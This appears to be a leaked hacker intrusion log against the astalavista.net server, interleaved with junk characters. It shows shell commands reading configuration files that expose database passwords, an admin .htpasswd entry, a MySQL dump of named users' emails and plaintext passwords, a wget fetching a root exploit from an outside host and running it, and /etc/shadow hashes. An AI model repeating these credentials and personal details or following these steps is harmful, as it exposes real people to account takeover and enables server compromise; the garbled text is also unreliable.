7 W: c8 v% M$ [5 I1 Q; Tdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007& W" }$ Z5 ?' G1 t- |" c0 v
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
P8 U$ f- R* H6 gdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com* F& k1 R2 \& A) T9 m
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
9 b# K, E. C) E+ }1 Rdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner, O( Q+ ?- w" }) i. x
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
; z: s4 Y5 J) Wdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
6 a& W# i, \9 Q: `drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
3 v+ a$ j* n4 j7 s: Y3 hdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd. c% J3 T! {$ k! F& Y
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php7 i F s3 y7 R7 P3 H. m
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico$ J: u9 Y7 U7 _' L
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
* E/ S+ K& S$ i& k+ h4 ]4 \) k" Gdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
j+ O% U2 M! x; I2 \/ y; s2 a-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess7 ^. F, g: P7 ]4 {8 y2 M5 C
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess, ?- ]3 p/ ]5 J, x+ ^5 z- @' o
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php& n3 D+ Y( ]" K7 T& E1 x3 Q: @
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
' S* o- r6 h. c' z! Z' m-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
' K7 g" w: Q, @ c1 l0 C6 Z-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php9 z. R( e" o; C- \3 U9 j. K; x
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
8 X+ G. n, c+ D# fdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc: y! n, x6 e6 E( n
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
: ]" V; h! U5 X7 L3 S/ bdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib! X0 }& X: U* ~) X; d+ M1 C
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log1 {% J* p$ D0 y& t
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
( I, D8 T/ Q0 [, c$ C" {drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
$ p0 b% ~5 z. X7 Q) Edrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
4 e; \1 i |( `* j1 S-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
7 B: m0 Y: N9 d* ~- i* T6 bdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re* a9 x. e. A; T2 \
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt9 _# G' \' j: O+ J1 O6 h
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
9 I' A2 o* I/ d' Sdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
2 V6 } G8 F8 w4 W& i7 t; xdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com; O. X, @& v" o2 I W
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes2 r+ d# Q8 \& J, d) o
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
1 H' ^' N# Z5 \drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
; f& q" g: F: w. p+ n# odrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
; @( b3 V/ ~5 o, s, Qdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
7 ^7 n/ v2 P0 u( r `, |-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php; Y3 K7 l4 T% P4 X8 D; T+ U
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
. b/ s6 g4 C& X! _% Z, A
# Y8 s0 O5 a% tsh-3.2$ head -20 index.php
. G5 c0 C# s) U/ m8 m G) I<?PHP6 E) Q q* ]6 s+ B' }/ m1 q2 U
/**# g+ O! b& ?* H% v+ u
* Mainfile (external) for astalavistaNET v2.00 [9 M9 e( H8 s2 t
*9 j* S7 H2 v; s- A# T' ]
* @copyright Astalavista IT Engineering GmbH
3 b7 J& P6 Q4 u' S! C* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>4 _5 z* b) i0 r( A
* @version 1.0) f# p! ~+ y4 A1 _7 k s! |4 q
*/3 v/ E9 p2 u, f1 {) M
" e, y0 l$ a$ z/ n6 [: h' J3 y. P! y, x if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
/ V, p* x% ?0 z% x$ r $dontStartSession = false;- z4 f+ x8 m- B* b( L
} else {9 U5 C7 P) @/ v P1 c
$dontStartSession = true;
# T! e( ]! [5 @; N" Y }
/ E6 f$ U( c2 U) y& r1 ^+ q9 N require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);) D6 ^3 d0 m+ w" z
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);* x0 h4 C) V4 Z2 u5 }+ f
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
( f) s" N( k2 C9 H2 U require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);; o# |" b9 Z" b" t: S+ k
+ \( d* M* d( F/ Esh-3.2$ cd config% {' Z z! T. ^
sh-3.2$ ls -la
0 x& k1 [9 X" t7 Utotal 32
; ?/ q! S9 h6 `% Qdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .. f/ E' n4 P7 W
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
6 a2 W, N, A5 s9 x9 j-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php$ G P: O4 s/ H q
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php- z& U: i7 W, ?& r1 r
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
# K% j. R' s$ r' |, d# o4 U-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php( H" ^. I& w% E) n" @6 h
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
0 w( ?9 I5 w; g9 w, k% X
6 P) b0 a! ^3 b+ V7 U5 ush-3.2$ cat com.conf.php
" F3 g4 R/ K7 E) m# P. a5 F; \3 z[snip]0 f# a* Y, w5 y6 d8 D: V! F& u$ M. a
//member-database, u0 P; u7 v2 { C( n. E5 t( y9 w2 m
$_CONFIG['db_mem_server'] = ‘localhost’;
0 ]1 d1 [5 d/ Z: h$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
5 k1 ^/ g8 g9 }% g3 x1 Y7 v$_CONFIG['db_mem_user'] = ‘astanet_db’;
/ v5 t9 u+ n- w( O3 r$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
! S( m% O A/ A2 p( f$ }1 ^$_CONFIG['db_mem_debug'] = false; //true or false2 y5 R' u) N' G6 \/ E3 v
//ads-database
& K6 |% ^* x) T# D2 ]4 m' X$_CONFIG['db_ads_server'] = ‘localhost’;- W0 v& ^: l& Z* [0 b/ G
$_CONFIG['db_ads_database'] = ‘astanet_ads’;. ?( W$ C7 n, H9 y1 c- ?
$_CONFIG['db_ads_user'] = ‘astanet_db’;
9 C' D5 k: Y; u$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
9 J G; z9 T9 A8 s* ~# W$_CONFIG['db_ads_debug'] = false; //true or false
8 \7 k& j3 R6 C# l2 z( ?7 i) ?//rainbow-database
. H( S$ w! B- U! z$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
( |' u# M7 q: e, M. e$_CONFIG['db_rainbow_database'] = ‘rainbow’;
1 \ W+ ~' G4 d8 a+ a$_CONFIG['db_rainbow_user'] = ‘dinu’;" A. g, Y: k0 w* Y9 |! X Z
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;6 m8 y) w7 q# E. U& F; P, P+ C
$_CONFIG['db_rainbow_debug'] = false; //true or false/ D* c* U& e3 H) k$ \3 o: l0 b
//mailing lists database: \! y9 e: _% B0 o* J) Z3 y
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;* _; D `. I( r2 j4 j' m/ E( `
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;+ r) M) X4 z: i* a2 i
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;$ T6 `0 D' v) w3 a
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
2 H9 w& y: U4 b6 g; T/ D$_CONFIG['db_mailing_lists_debug'] = false; //true or false \) k ^- c0 h3 p( i/ t! |! o
//paypal* i0 z6 ?8 A! A+ G: r# t. O/ u! O) Y' I
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
( s1 ?+ X" j' Z9 k& w7 `2 I0 r$_CONFIG['sub_pp_cmd'] = ‘_xclick’;8 f) n' j! l I* b( [
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
" _1 C* O6 d: X/ S5 f7 p9 M6 T$_CONFIG['sub_pp_noship'] = ‘1′;
/ e% x. s' Q, k2 a0 M% S& h$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;/ X5 z: a& U' K& I4 @1 N
[snip]
& L/ y6 m+ t3 E9 `
0 T8 N2 A9 [8 {4 U$ [6 Y3 qsh-3.2$ cd ..! h k. i _: O2 v
sh-3.2$ cd member' v0 A N3 u+ m0 G8 M8 W: n
sh-3.2$ ls -la5 G/ [5 i) `/ H" p. f9 S w1 \
total 20
% ~; S4 n0 J8 ]( V; `" b9 h& rdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .; J- \8 |. U& u$ ^: H
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
2 q: f# w; O8 @ _- I-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess# ]# }* J+ V8 R V3 M% ?
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
2 @7 Z' L" v$ e) Fsh-3.2$ cat .htaccess. R$ @# p5 q8 T, e# ?( L
SecFilterEngine off H* H6 f p2 w+ ? C
$ X( \; L& ~: H2 l P% g$ V7 h
sh-3.2$ cd ..
% l$ B* N' v; o# a4 q9 v! b/ Z' O7 P- Dsh-3.2$ cd cron3 }& c6 r. M' T. e
sh-3.2$ ls -la
$ i& f ^' E' U% h5 z& Ltotal 168/ z+ l* @, V2 L. ~
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
, `; ~8 h5 v/ C4 Y% G6 n* V8 kdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... Z w% z) @( b- h0 v+ O7 N8 W
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php; B+ D# {3 E) T0 K" v' W
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
( f4 N: u$ j c* F4 q-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
& q( s4 l: ~1 J-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php7 P5 F+ c1 O5 f$ b& o$ _5 J
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
; C& j, `5 _2 g0 |4 |' I+ q-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php8 O0 Z0 T! e7 R+ L1 v% w0 {
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php5 H! x7 z4 t) U; e
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php7 i7 W! o5 K9 Q: `
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh( K+ l) E9 _: b. d! F U& {( E
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
5 G! j Q! D6 F) L2 I' _-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
" ^* ?. u7 j) i-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php* Z+ V2 G' ?1 W- ~1 q: P& E# j
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
! a; a+ R4 b j6 z0 D- A" _-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
+ [$ U4 w3 |) V0 e! Q w( l-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
. \4 A* I& N+ C A3 [' g* d' A-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
1 I- J- @0 a/ S-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
% t8 S) W9 U# T2 \( ]3 @-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php+ o* J; T- [4 X3 j' ^1 R
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
/ [. p- h. E/ J4 k-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
* m2 q! w/ T X$ f1 N6 n-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php( X7 u% x/ \8 G1 Z! o& @8 e4 B
. m. A7 D3 l) r% R4 Fsh-3.2$ cd .. r1 M. K# x2 }, A2 H( q7 ]
sh-3.2$ cd _007$ C5 W& P' z& `0 \% _
sh-3.2$ ls -la, n5 q5 z- Y8 U
total 24
* e5 T) p, R" i+ Y% Y9 @& B9 vdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
/ i$ k" S7 {4 n. Sdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..1 W' {! }4 d k2 X, e0 ?! w
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess4 c' f: R4 f7 {# F
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php b3 O0 I3 g! g% X8 K& f
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php/ a' s" V1 ?- R6 U L
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap S" H0 A& L; _% ^
, G( s' Y$ _7 C& m" X
sh-3.2$ cat .htaccess9 f* ?/ h1 Z1 n6 z4 U& [" ^
authType Basic- T8 m4 M* J) D0 n
authName Admin
' j2 V% L! b- {0 f/ ?9 M3 iauthUserFile /home/astanet/auth/.htadm_pwd
$ j6 u. O4 ]! ?2 s# m) ^" C4 ]require valid-user* x3 ^( g" X9 a, c- Z: }/ A. O
; S8 `; Q; V" m3 x& ` y* msh-3.2$ cat /home/astanet/auth/.htadm_pwd
6 y& f f7 S" }9 Y. G$ p5 U0 Eadmin2net:CR0bl65MwhfT9 ?" S3 j6 _& ~) P$ R+ B2 \& p. [
" I t' Z4 Y- ^sh-3.2$ mysql -u astanet_db -p3 W6 D; j. P! l' ?2 l% P: ^
Enter password:
5 \" X. o3 K; W, g' D# hWelcome to the MySQL monitor. Commands end with ; or \g.; |) O4 d0 C6 u
Your MySQL connection id is 275153
6 O; a. [& G+ k' Z% a1 o; S9 c0 VServer version: 5.0.45-community-log MySQL Community Edition (GPL)! g. O8 |2 g3 b! B0 E. m
/ w6 \; j" ~8 Y5 x) a( R
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 ]& D/ V, C/ ]1 e* q3 [$ ]
) j5 X# k% L0 p2 @: Y4 J" \mysql> show databases;
' U. r, t4 Y! O' h9 a+———————–+
) @$ U& m' m8 W% @9 W| Database |0 e0 a0 N! _* [6 p: G
+———————–+
( _: r$ V2 s0 T| information_schema |8 X1 M( O: }* g9 J/ s
| astanet_ads |0 G; O' H4 c. L; ]1 V1 r
| astanet_mailing_lists |
, v) @0 J) c- | }8 F8 i| astanet_mediawiki |3 E. O- G+ J! z- M9 U p
| astanet_membersystem |
! a. c, r0 y0 E! [8 X& }+ B% T| test |; n5 C5 \( l" A3 f
+———————–+9 u2 p3 z: E* N4 {% U
6 rows in set (0.00 sec)& h. _ c* T. l- o5 _1 @' @# i! M
' {6 W0 R& V q' Wmysql> use astanet_membersystem
$ R) h& b. z, w6 A0 \2 C9 p. LDatabase changed
+ U8 t* y X9 H6 j2 Dmysql> show tables;
?, `# D! q8 I+ j5 N% Y0 W! p+———————————–+, O: {& W7 {0 l: G9 c& [4 E
| Tables_in_astanet_membersystem |5 |) g+ i5 I% U ~; O8 S
+———————————–+
; i5 a6 f2 c! @, z4 m| blacklist_categories |0 q3 |* M* j3 F2 | `) l: W5 C) V: Z
| blacklist_content |
, g- D6 C( S/ q- s, X, p| blacklist_levels |
% H x* z6 c# ]/ A8 Y| blacklist_mcset |
" M9 z3 w/ L* N* p- G- k| dir_categories | G( H" u3 R- V8 w1 ^. j. \( J
| dir_comments |5 s' G/ \6 J1 j: ~$ o8 @2 H6 {
| dir_links |7 Y" R4 o) u: W: L0 {9 l# n5 i8 d
| dir_temp |9 A4 n2 d0 k# p2 K& n
| dir_votes |* {+ X5 B5 _8 ] g n' U6 [; Z- K
| documents |
9 s% G4 U/ _8 N0 G% X3 J8 D| documents_categories |
E7 ]8 w* K% n" z/ @% N/ U( E5 L. R| email_content |
* y! h8 W: ^/ u, y( `& b1 t; ]6 J| email_settings |
5 t4 E7 [( l4 [ G5 W/ E| exploits |+ k( P6 {4 n( A y6 v6 i! x
| exploits_categories |9 D. p9 W+ [) t; L8 n: O
| exploittree_categories |& g5 e5 @8 E- q& R: x! Z2 m0 }
| exploittree_exploits |
5 t8 G3 m- n% _, l) |7 o' X| home_values |/ F! e" Y$ Y$ ^
| iso_countries |
5 C; M) `) \: Q4 j# ?| links_categories |9 v/ B0 R D; P! {+ z$ T
| links_records |2 y0 e4 R1 }) k- K# S& y3 o( v7 a
| links_unauth |
1 j- R# h |: y X0 e| links_votes |
1 d+ I( d6 j7 K& |# K0 W$ ?| log |1 {8 J' S9 T: \
| news_categories |8 z& H) u+ q1 r5 \- n5 [: U2 M
| news_comments | t: J! g, G% Z; k; q" f8 ? X4 \
| news_emoticons |; e' ^5 Y! P+ q: Y6 l V0 ~6 D
| news_latest |& G. I g" y. ?- c
| news_messages |* H! ?4 M* ?) E. `' W
| news_statistics |
& i9 }1 ~* x9 a| news_votes |
. ]* J& n5 X2 i1 ]# ^$ U7 F7 j| prices_content |
, z( {: y. t3 U4 y2 c| prices_offers |
/ V; }* P( T+ [# T# m( U2 p, M S9 a| rss_settings |$ B% _/ ^& V* Y# R
| sessions |" ~$ r7 ^# {" O0 v* v7 `5 z
| stats_signups |
5 `0 A6 f1 e1 z/ [' x| u2u2 |
6 y' x5 K8 ~% s* A# u9 U| u2u_contact |
5 \" G& ]0 X! [| u2u_settings |+ u ~# a! |, V# X7 H: k& C
| user_keywords_selected_categories |* r3 ~$ l+ Y7 a/ | y
| users |! A$ [# k4 h: a/ W
| users_ipn_test |# j( S) _9 t3 }+ z1 ~( @ w
| users_keyword_values |
; w4 [& j& ]6 K# s! @0 n5 C3 g+ z| users_profile |
: w5 h9 `2 N* c; R8 j8 Y# I| users_temp |2 b* r# Z1 {* E$ A/ `* U
| users_upgrade |4 C' E- K8 G% q
+———————————–+% K* M( P7 |) H: i( d% b1 \3 t
46 rows in set (0.00 sec)
' }! m5 x+ U8 S2 Y
/ n" O+ }4 F! i/ g+ @. C2 A( D8 qmysql> describe users;
6 u* j/ s9 y' I ]) |/ ~+————————–+————————————–+——+—–+———————+—————-+9 B0 H+ O {5 N
| Field | Type | Null | Key | Default | Extra |9 }) v( j7 x/ H0 M; h& N6 q. h X
+————————–+————————————–+——+—–+———————+—————-+/ D% |# ^ }" x6 e; G6 v n
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |7 k: {4 f6 D- R5 \! v* e( F
| user | varchar(50) | NO | | | |
% D; M$ P/ `. S. G0 P| nickname | varchar(30) | NO | MUL | anonymous | |
# r; t+ R2 W* E- {8 p# E: m" f| password | varchar(30) | NO | | | |. S5 @5 |* J. J# Y+ q' Q
| userlevel | tinyint(3) | YES | MUL | NULL | |
6 c9 t: i/ n! v* D( v# l) @% `& `' M| exp | int(8) unsigned | NO | | 0 | |
2 X U6 k, D2 @3 c6 q/ B2 A| email | varchar(50) | NO | | | |7 o- C5 ?! C' B+ T# ?
| ip | varchar(15) | NO | | 0 | |
/ e" A7 }. f, B; O5 F| proxy | set(’0′,’1′) | NO | | 0 | |+ z* E8 o8 p5 ?' q; H
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
. [7 v9 r9 |5 b7 a7 s4 O| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
' N, c8 e( @' b/ a8 Y4 Y. Z$ \2 D| anz_in | tinyint(1) | NO | | -1 | |
1 O' ?( F' X# g| status | tinyint(1) unsigned | NO | | 0 | | i+ ~ ]6 d" \/ w% }
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
w. }( \% q8 P6 v7 Z0 P" L% s| freemember | set(’0′,’1′) | NO | | 0 | |. v1 s$ k$ y: q! F8 C
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |; N" v; I$ c- u
| lang | tinytext | NO | | | |5 {$ e8 \1 K4 ]
| adid | smallint(6) | NO | | 0 | |
% |; S D/ x" j4 V7 @| pp_txn_id | varchar(255) | YES | | NULL | |" p g% I4 \; ~7 F6 [6 f" G2 x* d
| cnb_transaction_id | varchar(255) | YES | | NULL | |. N; ?0 F* V$ z+ R+ M! J* y
| cnb_order_id | varchar(255) | YES | | NULL | |
) o; i: e2 B3 k6 ]1 F* n' H. e' r| cnb_user_id | int(11) | YES | | 0 | |
; ?, z4 T/ s' n) G2 `4 @% L+————————–+————————————–+——+—–+———————+—————-+2 N; `, y! `% S% v
22 rows in set (0.01 sec)
" _- j+ J2 G" f a' D( r3 Z5 i' s& D/ n4 S
mysql> select count(*) as skids from users;1 W0 z3 ^$ K: G$ ]# r
+——-+
9 C, u5 y& e; i| skids |
% x' h/ G& S3 H2 s+——-+
: z) y- C6 E2 r7 `8 k, U5 {$ p% R5 ]| 25199 |% t% S( u9 ]5 p" h( ]
+——-+
0 E# U/ y$ g1 } b. Z1 row in set (0.00 sec), a: s' B/ ]# R, w g% e
. }. U4 h* v8 n1 umysql> select user,nickname,password,email from users where userlevel = 1;* u) W+ B7 z6 @7 t6 [: ]3 j2 ]
+————————–+———————-+——————+———————————–+, q: S6 [0 f7 I2 |; A
| user | nickname | password | email |
& |: e* m J8 o# [) y5 p+————————–+———————-+——————+———————————–+
9 q6 Z# x4 H; j( k| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
: }0 F; K* \# O _| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |6 i; l" F4 {4 _- {! T0 j% K, J; k7 }
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
; G0 [7 r4 z; Z0 {- t7 K| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |: n4 G- ^0 I, {: p( f3 k
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
/ z$ f( R. [/ w* @# K| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |2 v5 E0 [+ D) u0 Q& J
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
" e1 N$ i: T# a( \' X; z. l4 V| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |1 T/ S6 n- y0 a0 r" J5 V
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
. x4 N& l+ [1 D) }! O| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |+ z! T7 x0 U' s; q# ^ N0 Q, t
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
+ C4 p, l, s7 A9 q' A( A% l/ o: @- l| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
! Z" Q% P% Q/ @2 Y; M5 D3 u. b| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |( c7 D y2 r6 v/ U/ H" G! F; N
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |' ]3 W' R3 n+ G1 u. Q' Y
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
' u/ |: A; u8 \- j| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
# w+ Y: w0 @! y) A1 U3 x| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
. p W7 A8 m1 a, k5 r| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |5 o) m* ` x4 J* \1 p# Q; Z
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |, [1 f3 _* r% H6 b+ J
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
; M" B; E5 A- r( t0 a, B| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |/ l0 g1 \% M- X6 K8 P2 k$ U7 Q
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |. u# L. |2 \5 m
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
+ y7 ]+ \. K: ]$ s7 ?| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
, A3 t2 u1 o/ s$ l5 i' ~; v$ u7 c7 }| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
% k! |7 q$ b3 m& b/ E1 g% h| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |; Z9 r& Y$ L) U. K& i! J) [
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
7 t" \: c S' r7 \2 l) i! z+————————–+———————-+——————+———————————–+! S$ |: M$ D* h$ [! E) X0 s4 y3 ^ Y
27 rows in set (0.00 sec)
7 E- m( K# @1 Q9 R1 ]+ s2 O5 M+ }7 k
mysql> exit;
) V' G; c4 ^' N' v$ a" v4 w+ |Bye
6 B: S( @% N' j7 v5 y3 Q- b
% F; W: v9 _( Z3 A6 A[~] plaintext passwords? yes,3 ~" _& a1 g; o+ G
Those so called “security professionals” who charge you $6.66 / month to
' Y* [& `4 ]' X( ]! l* Zregister at their hack-proof portal, save your passwords in plaintext…+ G9 N1 Q/ X( F& N; H% A, R
brilliant!
5 ^0 U3 o. ?- |1 O# k0 H+ x4 X
: ~+ O5 Z9 J# W[~] This been fun but we want more.
8 Y) w* _: D0 ~# m5 y( g6 [" B& I9 D% u) F4 O0 \
sh-3.2$ uname -a _% Y) P, P) h2 D
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux; n$ j$ s) l# U5 }; I( U: H
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]( p' k3 n' z5 r9 Z
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
4 Q' Y4 d \( S( R& FResolving anti.sec.labs… 13.33.33.37
. I2 T- d" k2 U+ SConnecting to anti.sec.labs|13.33.33.37|:80… connected.
/ p: _8 i. ?7 Q& M3 D f p0 r) p5 RHTTP request sent, awaiting response… 200 OK
& o1 V0 i+ t7 p7 ]# uLength: 18200 (18K) [text/plain]' P$ j9 |; K5 q" C
Saving to: `g0troot’
0 s0 Z- {1 E. [& J4 H, w) r* G& J: {) {$ J" v* F: P
100%[=========================================================================================================================================>] 18,200 58.6K/s in- Q2 o6 v5 G6 B. W
0.3s
& q: }! d$ `1 p6 v: v5 a s; r8 u! H5 c' ]
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
6 B ~, p$ J6 v; P/ @, J; d; D9 |( p' M
sh-3.2$ ./g0troot -i x86_64
7 J! R; t4 r. o* z1 ^[+] g0troot - anti.sec.labs: m9 N# j, ~, t2 q
[+] Target: 2.6.18-128.1.10.el5
: V+ J: i+ E. P0 r( ^* H6 G[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]7 n/ N# p# a, {9 g* N7 F
) u" }+ N1 A4 s C$ J% b5 x1 D
[+] r00tr00t6 {6 h3 i2 _$ D9 @7 Z& I& W
[~] Executing shell…8 a; O0 c$ l5 G6 k" M
2 q+ \8 P( V" T j6 ^! G @6 ash-3.2# id d; R( ~( j. x. v
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
4 d; s9 ?, T3 @/ k
: I' Q9 W6 G) ?, E3 u" Wsh-3.2# cat /etc/shadow$ u1 s, |2 q! a
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
! n8 V0 J* D* ?5 D$ _) e8 p[snip] D- O5 X+ J0 @( `! W& |, }
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
